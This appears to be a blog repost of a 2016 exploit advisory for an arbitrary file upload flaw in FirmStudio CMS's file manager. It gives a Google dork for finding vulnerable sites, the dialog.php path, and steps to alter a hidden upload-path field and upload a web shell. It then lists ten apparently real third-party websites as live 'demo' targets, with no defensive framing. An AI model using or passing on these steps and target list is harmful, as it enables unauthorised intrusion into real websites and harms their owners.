FirmStudio CMS (filemanager) Arbitrary File Upload

# Exploit Title : FirmStudio CMS (filemanager) Arbitrary File Upload
# Exploit Author : Ashiyane Digital Security Team
# Vendor Homepage : http://www.firmstudio.com
# Google Dork : intext:"Website by FirmStudio"
# Date: 23 May 2016
# Tested On : Kali
# Contact:n3t.hacker@gmail.com
###########M##########
# Exploit:include/filemanager/dialog.php
# Describe : Search dork and select Target. Put include/filemanager/dialog.php After url such as :
# http://site.com/include/filemanager/dialog.php
# Now Hold shift Key and Right Click -> inspect element
# Find : <input name="path" value="/client/site/site/uploaded_files/" type="hidden">
# You Can Change Upload Dir And Upload Shell
# Demo :
# http://www.hiphing.com.hk/include/filemanager/dialog.php
# http://www.cornes.hk/include/filemanager/dialog.php
# http://www.jinchuan-intl.com/include/filemanager/dialog.php
# http://www.starrhotels.com/include/filemanager/dialog.php
# http://www.jewelryshows.org/include/filemanager/dialog.php
# http://www.mhh.com.hk/include/filemanager/dialog.php
# http://www.metrokitchen.com.hk/include/filemanager/dialog.php
# http://www.alisan.com.hk/include/filemanager/dialog.php
# http://www.cornesworld.com/include/filemanager/dialog.php
# http://www.hairworks.com.hk/include/filemanager/dialog.php

CowoKerensTeam

Header Ads

FirmStudio CMS (filemanager) Arbitrary File Upload

Post a Comment

No comments

Follow Us

Facebook

Popular Posts

Sponsor

Comments

Labels

Blog Archive

Recent Posts

Popular Posts

CowoKerensTeam

Header Ads

FirmStudio CMS (filemanager) Arbitrary File Upload

Related Posts

Post a Comment

No comments

Follow Us

Facebook

Popular Posts

Sponsor

Comments

Labels

Blog Archive

Recent Posts

Popular Posts